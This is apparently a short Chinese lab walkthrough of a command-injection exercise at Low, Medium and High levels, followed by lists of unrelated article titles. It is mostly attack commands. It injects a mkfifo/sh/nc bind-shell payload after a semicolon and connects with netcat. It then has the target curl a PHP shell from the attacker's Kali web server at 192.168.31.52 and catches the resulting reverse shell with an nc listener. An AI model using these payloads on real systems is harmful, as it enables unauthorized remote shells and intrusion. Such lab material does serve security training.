开门见山


·Low

·Medium

·High

· 命令执行监听端口

;mkfifo /tmp/pipe;sh /tmp/pipe | nc -nlp 4444 > /tmp/pipe

nc 192.168.31.100 4444

· 反弹shell

拷贝shell文件

启动kali的apache服务

修改shell文件

命令执行漏洞执行shell

;curl http://192.168.31.52/1.php

Kali打开侦听

nc -nvvlp 1234

执行命令后接收到监听


最新文章

  1. 【ORACLE】ORA-12537 问题整理
  2. js 模块开发之一(模块开发价值)
  3. 算法训练 区间k大数查询
  4. 转:Android 设置屏幕不待机
  5. COJ 1007 WZJ的数据结构(七) 树上操作
  6. Nvelocity模板引擎开发网页
  7. 原生js简单实现双向数据绑定原理
  8. 【java】package
  9. VS 星期作业 if else的应用 做一个受不受异性欢迎的小程序
  10. 【LeetCode】4. 寻找两个有序数组的中位数
  11. Hyper-v UBUNTU 12.04 模板设置
  12. 一个评测指标就是MAP(Mean Average Precision)平均精度均值。
  13. Java 学习札记(一)JDK安装配置
  14. NOI.AC NOIP模拟赛 第二场 补记
  15. 解决win7远程桌面连接时发生身份验证错误的方法
  16. mybatis查询参数为0时无法识别问题
  17. SQL Server 查询数据库表的列数
  18. Collections中的各种方法
  19. Python 实现小数和百分数的相互转换
  20. 题解【luogu P2421 bzoj P1407 [NOI2002]荒岛野人】

热门文章

  1. 官网英文版学习——RabbitMQ学习笔记(四)Work queues
  2. oracle开机启动
  3. 068-PHP定义并输出数组
  4. pycharm 配置 github 版本控制 VCS
  5. Docker 搭建开源跳板机_jumpserver (运维开源堡垒机_jumpserver) Centos_7.0
  6. 每天一点点之vue框架开发 - vue 动态替换路由(地址栏)参数
  7. EUI库 - 快速入口之项目配置
  8. RecyclerView+FloatingActionButton应用
  9. POJ 2251:Dungeon Master
  10. 滴滴与Uber都盯上拉美市场!一场惨烈竞争谁能胜出?